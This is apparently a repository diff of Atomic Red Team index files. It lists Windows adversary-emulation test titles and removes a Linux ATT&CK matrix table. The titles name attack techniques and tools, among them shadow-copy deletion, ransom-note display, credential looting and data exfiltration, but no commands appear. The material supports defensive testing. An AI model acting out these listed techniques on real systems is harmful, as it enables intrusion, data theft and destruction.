- T1063 Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
- Atomic Test #8: Enumerate all accounts on Windows (Local) [windows]
- Atomic Test #9: Enumerate all accounts via PowerShell (Local) [windows]
- Atomic Test #10: Enumerate logged on users via CMD (Local) [windows]
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
- Atomic Test #4: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
- [T1069.002 Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md)
- Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
- Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
- Atomic Test #3: Elevated group enumeration using net group (Domain) [windows]
- Atomic Test #4: Find machines where user has local admin access (PowerView) [windows]
- Atomic Test #5: Find local admins on all machines in domain (PowerView) [windows]
- Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
- Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
- Atomic Test #8: Adfind - Query Active Directory Groups [windows]
- Atomic Test #9: Enumerate Active Directory Groups with Get-AdGroup [windows]
- Atomic Test #10: Enumerate Active Directory Groups with ADSISearcher [windows]
- Atomic Test #11: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
- Atomic Test #12: Get-DomainGroupMember with PowerView [windows]
- Atomic Test #13: Get-DomainGroup with PowerView [windows]
- Atomic Test #14: Active Directory Enumeration with LDIFDE [windows]
- [T1007 System Service Discovery](../../T1007/T1007.md)
- Atomic Test #1: System Service Discovery [windows]
- Atomic Test #2: System Service Discovery - net.exe [windows]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Windows Internal Packet Capture [windows]
- Atomic Test #5: Windows Internal pktmon capture [windows]
- Atomic Test #6: Windows Internal pktmon set filter [windows]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- Atomic Test #3: Network Share Discovery command prompt [windows]
- Atomic Test #4: Network Share Discovery PowerShell [windows]
- Atomic Test #5: View available share drives [windows]
- Atomic Test #6: Share Discovery with PowerView [windows]
- Atomic Test #7: PowerView ShareFinder [windows]
- Atomic Test #8: WinPwn - shareenumeration [windows]
- Atomic Test #9: Network Share Discovery via dir command [windows]
- [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
- Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
- Atomic Test #2: WinPwn - printercheck [windows]
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #1: System Information Discovery [windows]
- Atomic Test #6: Hostname Discovery (Windows) [windows]
- Atomic Test #8: Windows MachineGUID Discovery [windows]
- Atomic Test #9: Griffon Recon [windows]
- Atomic Test #10: Environment variables discovery on windows [windows]
- Atomic Test #13: WinPwn - winPEAS [windows]
- Atomic Test #14: WinPwn - itm4nprivesc [windows]
- Atomic Test #15: WinPwn - Powersploits privesc checks [windows]
- Atomic Test #16: WinPwn - General privesc checks [windows]
- Atomic Test #17: WinPwn - GeneralRecon [windows]
- Atomic Test #18: WinPwn - Morerecon [windows]
- Atomic Test #19: WinPwn - RBCD-Check [windows]
- Atomic Test #20: WinPwn - PowerSharpPack - Watson searching for missing windows patches [windows]
- Atomic Test #21: WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors [windows]
- Atomic Test #22: WinPwn - PowerSharpPack - Seatbelt [windows]
- Atomic Test #25: System Information Discovery with WMIC [windows]
- [T1010 Application Window Discovery](../../T1010/T1010.md)
- Atomic Test #1: List Process Main Windows - C# .NET [windows]
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
- Atomic Test #4: List Google Chrome / Opera Bookmarks on Windows with powershell [windows]
- Atomic Test #5: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt [windows]
- Atomic Test #6: List Mozilla Firefox bookmarks on Windows with command prompt [windows]
- Atomic Test #7: List Internet Explorer Bookmarks using the command prompt [windows]
- [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
- Atomic Test #1: System Network Configuration Discovery on Windows [windows]
- Atomic Test #2: List Windows Firewall Rules [windows]
- Atomic Test #4: System Network Configuration Discovery (TrickBot Style) [windows]
- Atomic Test #5: List Open Egress Ports [windows]
- Atomic Test #6: Adfind - Enumerate Active Directory Subnet Objects [windows]
- Atomic Test #7: Qakbot Recon [windows]
- Atomic Test #9: DNS Server Discovery Using nslookup [windows]
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1482 Domain Trust Discovery](../../T1482/T1482.md)
- Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
- Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
- Atomic Test #3: Powershell enumerate domains and forests [windows]
- Atomic Test #4: Adfind - Enumerate Active Directory OUs [windows]
- Atomic Test #5: Adfind - Enumerate Active Directory Trusts [windows]
- Atomic Test #6: Get-DomainTrust with PowerView [windows]
- Atomic Test #7: Get-ForestTrust with PowerView [windows]
- Atomic Test #8: TruffleSnout - Listing AD Infrastructure [windows]
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
- Atomic Test #1: File and Directory Discovery (cmd.exe) [windows]
- Atomic Test #2: File and Directory Discovery (PowerShell) [windows]
- Atomic Test #5: Simulating MAZE Directory Enumeration [windows]
- Atomic Test #6: Launch DirLister Executable [windows]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #1: System Network Connections Discovery [windows]
- Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
- Atomic Test #4: System Discovery using SharpView [windows]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
- Atomic Test #2: Process Discovery - tasklist [windows]
- Atomic Test #3: Process Discovery - Get-Process [windows]
- Atomic Test #4: Process Discovery - get-wmiObject [windows]
- Atomic Test #5: Process Discovery - wmic process [windows]
- Atomic Test #6: Discover Specific Process - tasklist [windows]
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
- Atomic Test #2: Basic Permission Groups Discovery Windows (Local) [windows]
- Atomic Test #3: Permission Groups Discovery PowerShell (Local) [windows]
- Atomic Test #4: SharpHound3 - LocalAdmin [windows]
- Atomic Test #5: Wmic Group Discovery [windows]
- Atomic Test #6: WMIObject Group Discovery [windows]
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
- Atomic Test #5: Examine local password policy - Windows [windows]
- Atomic Test #6: Examine domain password policy - Windows [windows]
- Atomic Test #8: Get-DomainPolicy with PowerView [windows]
- Atomic Test #9: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy [windows]
- Atomic Test #10: Use of SecEdit.exe to export the local security policy (including the password policy) [windows]
- [T1614.001 System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md)
- Atomic Test #1: Discover System Language by Registry Query [windows]
- Atomic Test #2: Discover System Language with chcp [windows]
- [T1012 Query Registry](../../T1012/T1012.md)
- Atomic Test #1: Query Registry [windows]
- Atomic Test #2: Query Registry with Powershell cmdlets [windows]
- Atomic Test #3: Enumerate COM Objects in Registry with Powershell [windows]
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #1: Security Software Discovery [windows]
- Atomic Test #2: Security Software Discovery - powershell [windows]
- Atomic Test #5: Security Software Discovery - Sysmon Service [windows]
- Atomic Test #6: Security Software Discovery - AV Discovery via WMI [windows]
- [T1018 Remote System Discovery](../../T1018/T1018.md)
- Atomic Test #1: Remote System Discovery - net [windows]
- Atomic Test #2: Remote System Discovery - net group Domain Computers [windows]
- Atomic Test #3: Remote System Discovery - nltest [windows]
- Atomic Test #4: Remote System Discovery - ping sweep [windows]
- Atomic Test #5: Remote System Discovery - arp [windows]
- Atomic Test #8: Remote System Discovery - nslookup [windows]
- Atomic Test #9: Remote System Discovery - adidnsdump [windows]
- Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects [windows]
- Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects [windows]
- Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
- Atomic Test #16: Enumerate Active Directory Computers with Get-AdComputer [windows]
- Atomic Test #17: Enumerate Active Directory Computers with ADSISearcher [windows]
- Atomic Test #18: Get-DomainController with PowerView [windows]
- Atomic Test #19: Get-WmiObject to Enumerate Domain Controllers [windows]
- Atomic Test #20: Remote System Discovery - net group Domain Controller [windows]
- [T1046 Network Service Discovery](../../T1046/T1046.md)
- Atomic Test #3: Port Scan NMap for Windows [windows]
- Atomic Test #4: Port Scan using python [windows]
- Atomic Test #5: WinPwn - spoolvulnscan [windows]
- Atomic Test #6: WinPwn - MS17-10 [windows]
- Atomic Test #7: WinPwn - bluekeep [windows]
- Atomic Test #8: WinPwn - fruit [windows]
- [T1518 Software Discovery](../../T1518/T1518.md)
- Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
- Atomic Test #2: Applications Installed [windows]
- Atomic Test #4: WinPwn - Dotnetsearch [windows]
- Atomic Test #5: WinPwn - DotNet [windows]
- Atomic Test #6: WinPwn - powerSQL [windows]
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1124 System Time Discovery](../../T1124/T1124.md)
- Atomic Test #1: System Time Discovery [windows]
- Atomic Test #2: System Time Discovery - PowerShell [windows]
- Atomic Test #4: System Time Discovery W32tm as a Delay [windows]
- Atomic Test #5: System Time with Windows time Command [windows]
# impact
- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1492 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561 Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1489 Service Stop](../../T1489/T1489.md)
- Atomic Test #1: Windows - Stop service using Service Controller [windows]
- Atomic Test #2: Windows - Stop service using net.exe [windows]
- Atomic Test #3: Windows - Stop service by killing process [windows]
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1487 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1491.001 Defacement: Internal Defacement](../../T1491.001/T1491.001.md)
- Atomic Test #1: Replace Desktop Wallpaper [windows]
- Atomic Test #2: Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message [windows]
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1531 Account Access Removal](../../T1531/T1531.md)
- Atomic Test #1: Change User Password - Windows [windows]
- Atomic Test #2: Delete User - Windows [windows]
- Atomic Test #3: Remove Account From Domain Admin Group [windows]
- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
- Atomic Test #5: PureLocker Ransom Note [windows]
- Atomic Test #8: Data Encrypted with GPG4Win [windows]
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1496 Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows]
- Atomic Test #3: Overwrite deleted data on C drive [windows]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1490 Inhibit System Recovery](../../T1490/T1490.md)
- Atomic Test #1: Windows - Delete Volume Shadow Copies [windows]
- Atomic Test #2: Windows - Delete Volume Shadow Copies via WMI [windows]
- Atomic Test #3: Windows - wbadmin Delete Windows Backup Catalog [windows]
- Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows]
- Atomic Test #6: Windows - Delete Backup Files [windows]
- Atomic Test #7: Windows - wbadmin Delete systemstatebackup [windows]
- Atomic Test #8: Windows - Disable the SR scheduled task [windows]
- Atomic Test #9: Disable System Restore Through Registry [windows]
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #1: Shutdown System - Windows [windows]
- Atomic Test #2: Restart System - Windows [windows]
- Atomic Test #10: Logoff System - Windows [windows]
# initial-access
- [T1133 External Remote Services](../../T1133/T1133.md)
- Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows]
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1192 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1566.001 Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md)
- Atomic Test #1: Download Macro-Enabled Phishing Attachment [windows]
- Atomic Test #2: Word spawned a command shell and used an IP address in the command line [windows]
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1091 Replication Through Removable Media](../../T1091/T1091.md)
- Atomic Test #1: USB Malware Spread Simulation [windows]
- [T1195 Supply Chain Compromise](../../T1195/T1195.md)
- Atomic Test #1: Octopus Scanner Malware Open Source Supply Chain [windows]
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- T1193 Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1194 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
# exfiltration
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1020 Automated Exfiltration](../../T1020/T1020.md)
- Atomic Test #1: IcedID Botnet HTTP PUT [windows]
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md)
- Atomic Test #1: Exfiltrate data HTTPS using curl windows [windows]
- [T1041 Exfiltration Over C2 Channel](../../T1041/T1041.md)
- Atomic Test #1: C2 Data Exfiltration [windows]
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
- Atomic Test #3: DNSExfiltration (doh) [windows]
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1002 Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.003 Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md)
- Atomic Test #1: Exfiltrate data with rclone to cloud Storage - Mega (Windows) [windows]
- T1030 Data Transfer Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1022 Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
- Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows]
- Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows]
- Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
- Atomic Test #6: MAZE FTP Upload [windows]
- Atomic Test #7: Exfiltration Over Alternative Protocol - FTP - Rclone [windows]
-94
@@ -1,94 +0,0 @@
# Linux Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Shell Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Systemd Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
